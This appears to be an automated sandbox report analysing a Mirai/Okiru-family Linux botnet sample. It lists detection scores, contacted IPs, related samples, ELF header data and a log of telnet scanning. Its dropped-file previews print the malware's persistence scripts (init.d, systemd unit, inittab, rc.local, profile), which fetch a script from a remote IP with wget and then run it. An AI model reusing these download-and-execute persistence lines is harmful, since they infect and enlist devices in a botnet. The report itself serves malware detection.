          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574229 Sample: x86_32.nn.elf Startdate: 13/12/2024 Architecture: LINUX Score: 96 51 155.96.178.156, 23, 52864 ZAMRENZM United States 2->51 53 90.250.123.174, 23, 44108 VodafoneGB United Kingdom 2->53 55 98 other IPs or domains 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected Okiru 2->61 63 2 other signatures 2->63 8 x86_32.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 4 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 65 Sample tries to set files in /etc globally writable 8->65 67 Sample tries to persist itself using /etc/profile 8->67 69 Drops files in suspicious directories 8->69 71 2 other signatures 8->71 18 x86_32.nn.elf sh 8->18         started        20 x86_32.nn.elf sh 8->20         started        22 x86_32.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/sh, POSIX 24->49 dropped 73 Drops files in suspicious directories 24->73 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 4 other processes 24->41 signatures9 process10 signatures11 75 Sample tries to set files in /etc globally writable 28->75 77 Sample tries to persist itself using System V runlevels 31->77
          SourceDetectionScannerLabelLink
          x86_32.nn.elf40%VirustotalBrowse
          x86_32.nn.elf45%ReversingLabsLinux.Backdoor.Mirai
          x86_32.nn.elf100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          /etc/init.d/sh3%ReversingLabsText.Browser.Generic
          /etc/init.d/system3%ReversingLabsText.Browser.Generic
          /etc/rc.local0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://94.156.227.233/curl.shx86_32.nn.elffalse
            high
            http://94.156.227.233/lol.shx86_32.nn.elffalse
              high
              http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sx86_32.nn.elffalse
                high
                http://94.156.227.233/x86_32.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  44.224.181.171
                  unknownUnited States
                  16509AMAZON-02USfalse
                  174.194.249.14
                  unknownUnited States
                  22394CELLCOUSfalse
                  124.189.196.216
                  unknownAustralia
                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                  57.215.48.129
                  unknownBelgium
                  2686ATGS-MMD-ASUSfalse
                  220.235.63.126
                  unknownAustralia
                  7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                  17.45.30.32
                  unknownUnited States
                  714APPLE-ENGINEERINGUSfalse
                  210.51.211.113
                  unknownChina
                  9929CUIICHINAUNICOMIndustrialInternetBackboneCNfalse
                  103.121.133.49
                  unknownIndonesia
                  131478CLARENCE-AS-APCLARENCEPROFESSIONALOFFICESPTYLIMITEDAfalse
                  194.245.186.15
                  unknownGermany
                  5517CSLDEfalse
                  208.46.97.148
                  unknownUnited States
                  209CENTURYLINK-US-LEGACY-QWESTUSfalse
                  197.254.172.29
                  unknownLesotho
                  37057VODACOM-LESOTHOLSfalse
                  83.122.188.192
                  unknownIran (ISLAMIC Republic Of)
                  197207MCCI-ASIRfalse
                  155.15.100.64
                  unknownCanada
                  40155APLLIUSfalse
                  121.121.9.246
                  unknownMalaysia
                  9534MAXIS-AS1-APBinariangBerhadMYfalse
                  23.155.83.6
                  unknownReserved
                  22652FIBRENOIRE-INTERNETCAfalse
                  134.188.53.245
                  unknownNetherlands
                  42808VIRTELA-NET-VNLAMS1NLfalse
                  210.161.180.248
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  191.228.69.4
                  unknownBrazil
                  26615TIMSABRfalse
                  110.174.129.4
                  unknownAustralia
                  7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                  214.21.154.124
                  unknownUnited States
                  6026DNIC-ASBLK-05800-06055USfalse
                  207.140.221.139
                  unknownUnited States
                  4473ATTIS-ASN4473USfalse
                  154.245.108.99
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  58.204.40.109
                  unknownChina
                  4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  146.230.119.134
                  unknownSouth Africa
                  2018TENET-1ZAfalse
                  167.3.212.100
                  unknownUnited States
                  6448QADUSfalse
                  121.17.55.106
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  80.254.57.177
                  unknownRussian Federation
                  39046THEOREMAStPetersburgRussianFederationRUfalse
                  177.144.171.0
                  unknownBrazil
                  27699TELEFONICABRASILSABRfalse
                  90.250.123.174
                  unknownUnited Kingdom
                  5378VodafoneGBfalse
                  77.150.89.131
                  unknownFrance
                  15557LDCOMNETFRfalse
                  29.221.57.132
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  65.255.177.227
                  unknownCanada
                  32233PERSONACAfalse
                  9.148.99.252
                  unknownUnited States
                  3356LEVEL3USfalse
                  173.100.238.188
                  unknownUnited States
                  1239SPRINTLINKUSfalse
                  20.150.35.74
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  126.199.69.53
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  14.230.224.164
                  unknownViet Nam
                  45899VNPT-AS-VNVNPTCorpVNfalse
                  18.141.138.35
                  unknownUnited States
                  16509AMAZON-02USfalse
                  159.4.36.240
                  unknownUnited States
                  1906NORTHROP-GRUMMANUSfalse
                  47.175.106.200
                  unknownUnited States
                  5650FRONTIER-FRTRUSfalse
                  22.216.227.222
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  217.191.134.17
                  unknownGermany
                  6805TDDE-ASN1DEfalse
                  56.228.134.107
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  48.14.166.231
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  55.118.20.64
                  unknownUnited States
                  361DNIC-ASBLK-00306-00371USfalse
                  18.65.61.52
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  83.109.212.250
                  unknownNorway
                  2119TELENOR-NEXTELTelenorNorgeASNOfalse
                  113.139.190.52
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  128.164.245.188
                  unknownUnited States
                  11039GWUUSfalse
                  20.137.143.122
                  unknownUnited States
                  21877CSC-USAUSfalse
                  158.147.31.168
                  unknownUnited States
                  243HARRIS-ATD-ASUSfalse
                  37.20.160.128
                  unknownRussian Federation
                  12389ROSTELECOM-ASRUfalse
                  13.222.71.194
                  unknownUnited States
                  16509AMAZON-02USfalse
                  206.169.158.187
                  unknownUnited States
                  3549LVLT-3549USfalse
                  135.141.226.183
                  unknownUnited States
                  10455LUCENT-CIOUSfalse
                  48.252.209.208
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  108.246.54.50
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  18.165.52.22
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  5.234.109.63
                  unknownIran (ISLAMIC Republic Of)
                  58224TCIIRfalse
                  74.145.206.10
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  92.100.78.69
                  unknownRussian Federation
                  12389ROSTELECOM-ASRUfalse
                  9.187.47.127
                  unknownUnited States
                  3356LEVEL3USfalse
                  152.26.159.187
                  unknownUnited States
                  81NCRENUSfalse
                  20.24.177.207
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  178.102.103.224
                  unknownUnited Kingdom
                  12576EELtdGBfalse
                  96.47.236.159
                  unknownUnited States
                  53974JAZZ-NETWORKUSfalse
                  132.173.130.115
                  unknownUnited States
                  32982DOE-HQUSfalse
                  98.99.146.242
                  unknownUnited States
                  62566STARBUCKSUSfalse
                  184.215.20.254
                  unknownUnited States
                  10507SPCSUSfalse
                  202.203.59.67
                  unknownChina
                  4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  19.209.69.30
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  188.208.242.159
                  unknownIran (ISLAMIC Republic Of)
                  57218RIGHTELIRfalse
                  58.166.79.121
                  unknownAustralia
                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                  23.44.156.92
                  unknownUnited States
                  16625AKAMAI-ASUSfalse
                  13.137.0.129
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  109.126.166.161
                  unknownBelarus
                  44087BEST-ASBYfalse
                  8.215.225.213
                  unknownSingapore
                  45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                  132.64.26.6
                  unknownIsrael
                  378MACHBA-ASILANILfalse
                  94.217.211.82
                  unknownGermany
                  3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                  81.207.120.143
                  unknownNetherlands
                  1136KPNKPNNationalEUfalse
                  171.93.113.244
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  182.210.48.93
                  unknownKorea Republic of
                  17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                  177.145.51.90
                  unknownBrazil
                  26599TELEFONICABRASILSABRfalse
                  214.57.89.89
                  unknownUnited States
                  27064DNIC-ASBLK-27032-27159USfalse
                  190.176.34.26
                  unknownArgentina
                  22927TelefonicadeArgentinaARfalse
                  155.102.83.3
                  unknownUnited States
                  17055UTAHUSfalse
                  42.104.77.111
                  unknownIndia
                  55410VIL-AS-APVodafoneIdeaLtdINfalse
                  45.9.249.72
                  unknownRomania
                  9009M247GBfalse
                  221.22.160.53
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  44.89.67.209
                  unknownUnited States
                  7377UCSDUSfalse
                  135.182.78.52
                  unknownUnited States
                  46375AS-SONICTELECOMUSfalse
                  104.201.118.203
                  unknownUnited States
                  30036MEDIACOM-ENTERPRISE-BUSINESSUSfalse
                  151.184.50.171
                  unknownNetherlands
                  45025EDN-ASUAfalse
                  210.18.131.23
                  unknownIndia
                  17488HATHWAY-NET-APHathwayIPOverCableInternetINfalse
                  170.40.149.45
                  unknownUnited States
                  264957CoopercitrusCooperativadeProdutoresRuraisBRfalse
                  155.96.178.156
                  unknownUnited States
                  37532ZAMRENZMfalse
                  20.170.50.65
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  199.105.9.253
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  213.165.171.116
                  unknownMalta
                  12709MELITACABLEMTfalse
                  58.19.3.91
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  No context
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AMAZON-02UShttp://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                  • 52.24.227.163
                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 18.242.255.3
                  arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 44.228.127.176
                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 3.251.85.156
                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 18.184.233.255
                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 18.194.49.4
                  b3astmode.sh4.elfGet hashmaliciousMiraiBrowse
                  • 18.244.62.223
                  b3astmode.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 108.148.158.220
                  b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                  • 18.145.1.10
                  b3astmode.mips.elfGet hashmaliciousMiraiBrowse
                  • 54.68.211.1
                  CELLCOUSarm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 166.169.43.194
                  b3astmode.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 70.217.217.2
                  b3astmode.sh4.elfGet hashmaliciousMiraiBrowse
                  • 97.21.61.30
                  b3astmode.mips.elfGet hashmaliciousMiraiBrowse
                  • 174.241.72.47
                  b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                  • 174.197.240.230
                  loligang.spc.elfGet hashmaliciousMiraiBrowse
                  • 75.253.25.42
                  loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 97.9.134.109
                  2.elfGet hashmaliciousUnknownBrowse
                  • 70.223.58.93
                  2.elfGet hashmaliciousUnknownBrowse
                  • 97.53.95.239
                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 75.224.119.223
                  ASN-TELSTRATelstraCorporationLtdAUmipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 60.227.202.9
                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 121.219.7.151
                  b3astmode.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 120.157.226.110
                  b3astmode.mips.elfGet hashmaliciousMiraiBrowse
                  • 101.188.255.32
                  jade.sh4.elfGet hashmaliciousMiraiBrowse
                  • 124.191.33.29
                  jade.m68k.elfGet hashmaliciousMiraiBrowse
                  • 58.173.90.119
                  jade.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 165.228.2.56
                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                  • 121.223.152.48
                  loligang.x86.elfGet hashmaliciousMiraiBrowse
                  • 101.103.10.52
                  loligang.mips.elfGet hashmaliciousMiraiBrowse
                  • 101.188.125.251
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  /etc/init.d/systemx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                /etc/init.d/shx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              Process:/tmp/x86_32.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):111
                                              Entropy (8bit):4.663595298101345
                                              Encrypted:false
                                              SSDEEP:3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
                                              MD5:3290F4F4E0B77B577C59026DEF246CEE
                                              SHA1:C51EAE7170430B5697B881BE716280D1FAAA9147
                                              SHA-256:534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
                                              SHA-512:DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
                                              Malicious:false
                                              Reputation:low
                                              Preview:run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                              Process:/bin/sh
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):355
                                              Entropy (8bit):4.416220583499086
                                              Encrypted:false
                                              SSDEEP:6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
                                              MD5:4C835AF4434E28E5B56D8CDFA8EE753D
                                              SHA1:B18DA30B2DF68AE4C788540CED328CA545C02F42
                                              SHA-256:CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
                                              SHA-512:877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 3%
                                              Joe Sandbox View:
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              Reputation:low
                                              Preview:#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                              Process:/tmp/x86_32.nn.elf
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):98
                                              Entropy (8bit):4.615605979741142
                                              Encrypted:false
                                              SSDEEP:3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
                                              MD5:FE7F857A52EC42881A76D01D4A4A1C3C
                                              SHA1:6391FE715F06AB2D7E58D18A41ED3A358C7E820C
                                              SHA-256:20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
                                              SHA-512:4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 3%
                                              Joe Sandbox View:
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                              Reputation:low
                                              Preview:#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                              Process:/tmp/x86_32.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):103
                                              Entropy (8bit):4.612417623467759
                                              Encrypted:false
                                              SSDEEP:3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
                                              MD5:175C6814BBE06EB5816EFE3FE3934230
                                              SHA1:8C1A49BF7CA134E8AD0DDA70872367062BC600C5
                                              SHA-256:11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
                                              SHA-512:C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
                                              Malicious:false
                                              Reputation:low
                                              Preview:::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                              Process:/tmp/x86_32.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):53
                                              Entropy (8bit):3.871459242626451
                                              Encrypted:false
                                              SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                              MD5:2BD9B4BE30579E633FC0191AA93DF486
                                              SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                              SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                              SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:gorilla botnet is on the device ur not a cat go away.
                                              Process:/tmp/x86_32.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):94
                                              Entropy (8bit):4.486383977913608
                                              Encrypted:false
                                              SSDEEP:3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
                                              MD5:CEC61C0CDC61AB271C45B85281469388
                                              SHA1:E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
                                              SHA-256:AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
                                              SHA-512:71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
                                              Malicious:true
                                              Preview:/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                              Process:/tmp/x86_32.nn.elf
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):10
                                              Entropy (8bit):3.121928094887362
                                              Encrypted:false
                                              SSDEEP:3:TKH4vn:hv
                                              MD5:3E2B31C72181B87149FF995E7202C0E3
                                              SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                              SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                              SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:#!/bin/sh.
                                              Process:/tmp/x86_32.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):292
                                              Entropy (8bit):5.064804988275458
                                              Encrypted:false
                                              SSDEEP:6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
                                              MD5:8156A50E9D158639626649BD134E7D5D
                                              SHA1:D95D108656621F4B4F82B93CA0694D66F4A2FEF4
                                              SHA-256:FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
                                              SHA-512:DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
                                              Malicious:false
                                              Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):76
                                              Entropy (8bit):3.7627880354948586
                                              Encrypted:false
                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                              Malicious:false
                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):6.47604793028133
                                              TrID:
                                              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                              File name:x86_32.nn.elf
                                              File size:95'984 bytes
                                              MD5:b6c87b436d8de600e1f8c7978a098739
                                              SHA1:610ffdd17efa2412f76de225cc4b33102653b85d
                                              SHA256:8b1aeae909258c79a17d2d0590cf857ec7713c2c5ec0e0995d9294b60e6d3e8b
                                              SHA512:fb66e28ea70ce7dcd1c7333010b3859de70f37f43d211edabd6dd3b558daec75ad8c4b539b3955d9b46503f75cfbacbb264857a8056b2f78109ea5303c25faaf
                                              SSDEEP:1536:0jCBx/DDCJtD7hfuSRGgnVBszm+3bR/FmW3qHjQVYrrWO33kEWrzJuS3yQR9c:0jCBxruJtfhGSRG733bR9mWaHjQVqrWa
                                              TLSH:12935BC0E9C3E4F1E90614321177E7368A72E67D1039FA57EF68A632FD42610A61779C
                                              File Content Preview:.ELF....................d...4...`u......4. ...(......................e...e...............p.......... ... +..........Q.td............................U..S.......wo...h.....4..[]...$.............U......= ....t..5....$......$.......u........t....h............

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:Intel 80386
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x8048164
                                              Flags:0x0
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:95584
                                              Section Header Size:40
                                              Number of Section Headers:10
                                              Header String Table Index:9
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x80480940x940x1c0x00x6AX001
                                              .textPROGBITS0x80480b00xb00x134e60x00x6AX0016
                                              .finiPROGBITS0x805b5960x135960x170x00x6AX001
                                              .rodataPROGBITS0x805b5c00x135c00x2fdc0x00x2A0032
                                              .ctorsPROGBITS0x805f0000x170000x80x00x3WA004
                                              .dtorsPROGBITS0x805f0080x170080x80x00x3WA004
                                              .dataPROGBITS0x805f0200x170200x5000x00x3WA0032
                                              .bssNOBITS0x805f5200x175200x26000x00x3WA0032
                                              .shstrtabSTRTAB0x00x175200x3e0x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x80480000x80480000x1659c0x1659c6.59980x5R E0x1000.init .text .fini .rodata
                                              LOAD0x170000x805f0000x805f0000x5200x2b205.43940x6RW 0x1000.ctors .dtors .data .bss
                                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 13, 2024 06:12:50.917802095 CET43928443192.168.2.2391.189.91.42
                                              Dec 13, 2024 06:12:51.113266945 CET5190823192.168.2.23119.101.53.7
                                              Dec 13, 2024 06:12:51.113276958 CET4048023192.168.2.23132.64.26.6
                                              Dec 13, 2024 06:12:51.113292933 CET4671223192.168.2.2358.57.46.142
                                              Dec 13, 2024 06:12:51.113296986 CET4396223192.168.2.2396.47.236.159
                                              Dec 13, 2024 06:12:51.113311052 CET3534623192.168.2.238.215.225.213
                                              Dec 13, 2024 06:12:51.113332033 CET3737823192.168.2.238.123.43.188
                                              Dec 13, 2024 06:12:51.113332033 CET5221023192.168.2.2373.208.8.14
                                              Dec 13, 2024 06:12:51.113351107 CET3634023192.168.2.23207.140.221.139
                                              Dec 13, 2024 06:12:51.113370895 CET4496423192.168.2.2358.204.40.109
                                              Dec 13, 2024 06:12:51.113370895 CET5455823192.168.2.23204.39.7.11
                                              Dec 13, 2024 06:12:51.113375902 CET6003023192.168.2.23213.165.171.116
                                              Dec 13, 2024 06:12:51.113400936 CET4940623192.168.2.23217.191.134.17
                                              Dec 13, 2024 06:12:51.113401890 CET5924623192.168.2.2345.9.249.72
                                              Dec 13, 2024 06:12:51.113406897 CET5448623192.168.2.2317.45.30.32
                                              Dec 13, 2024 06:12:51.113401890 CET5452423192.168.2.2320.24.177.207
                                              Dec 13, 2024 06:12:51.113432884 CET4807623192.168.2.23100.220.11.149
                                              Dec 13, 2024 06:12:51.113455057 CET4179023192.168.2.23106.3.16.100
                                              Dec 13, 2024 06:12:51.113457918 CET3541823192.168.2.23134.188.53.245
                                              Dec 13, 2024 06:12:51.113472939 CET5530023192.168.2.2358.19.3.91
                                              Dec 13, 2024 06:12:51.113481998 CET4824823192.168.2.23194.245.186.15
                                              Dec 13, 2024 06:12:51.113497972 CET3701623192.168.2.2361.85.10.189
                                              Dec 13, 2024 06:12:51.113497972 CET5658823192.168.2.23140.69.243.183
                                              Dec 13, 2024 06:12:51.113516092 CET5374223192.168.2.23159.4.36.240
                                              Dec 13, 2024 06:12:51.113523960 CET5035423192.168.2.2377.150.89.131
                                              Dec 13, 2024 06:12:51.113523960 CET4491223192.168.2.234.112.207.233
